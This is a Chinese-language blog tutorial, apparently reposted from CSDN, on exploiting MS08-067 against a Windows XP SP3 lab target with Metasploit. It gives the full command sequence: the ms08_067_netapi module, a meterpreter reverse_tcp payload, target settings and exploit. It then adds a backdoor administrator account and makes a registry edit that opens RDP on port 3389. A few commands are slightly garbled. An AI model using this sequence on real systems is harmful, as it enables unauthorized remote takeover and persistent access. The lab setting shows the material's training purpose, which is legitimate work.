利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

  • A+
所属分类:安全文章

转自:CARlos_97

今天闲来无事,打开Kali来了一波MS08-067-netapi的复现
就是服务器服务中的漏洞可能允许远程执行代码
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。

实验准备

Kali虚拟机
靶机:Windows XP sp3

实验操作

打开Kali和靶机,ifconfig得到Kali IP 192.168.43.120
通过Nmap 扫描得到靶机 IP 192.168.43.201

进入matesploit
首先连接上postgresql

service postgresql statr
  • 1

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

寻找ms08_067_netapi模块

search ms08_067_netapi
  • 1

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

使用该模块

use exploit/windows/smb/ms08_067_netapi
  • 1

顺便加载一下payload

windows/meterpreter/reverse_tcp
  • 1

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

设置靶机IP和HOST IP

set LHOST 主机IP
set RHOST 靶机IP
  • 1

  • 2

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

寻找靶机相应版本的target
通常为34 也可以选择0 为自动

show targets
set target 34
  • 1

  • 2

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

接下来可以开始攻击

exploit
  • 1

建立了联系
利用ms08_067_netapi漏洞实现远程控制Windows XP sp3
可以开始远程操控提权了
首先建立用户再进行提权

Shell
  • 1

创建用户

user net host-name password /add
  • 1

用户提权

net localgroup administrators host-name /add
  • 1

注意:/add 前面有一个空格(本人因为没加空格吃亏了…)

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

扫描其端口

netstat -an
  • 1

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

发现其远程操控端口3389没有开,我们可以输入命令将它打开

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  • 1

  • 2

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

此时我们可以看到远程控制端口3389打开了
我们可以通过主机来远程控制
开始键+R 输入MSTSC
进入远程连接桌面界面

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

这时候靶机就有你创建的新用户了

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3利用ms08_067_netapi漏洞实现远程控制Windows XP sp3


在本次实验中遇到的问题

  1. 在设置好主机和靶机地址后,没有set targets 就开始攻击

  2. 在创建账户时,/add 前面没有添加空格,导致创建账户失败

  3. 在实验时所使用的靶机一定要没有补丁,要不可能会失败


原文链接:https://blog.csdn.net/CARlos_97/article/details/89503784


利用ms08_067_netapi漏洞实现远程控制Windows XP sp3


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

“如侵权请私聊公众号删文”



扫描关注LemonSec

利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

觉得不错点个“赞”、“在看”哦利用ms08_067_netapi漏洞实现远程控制Windows XP sp3


本文始发于微信公众号(LemonSec):利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: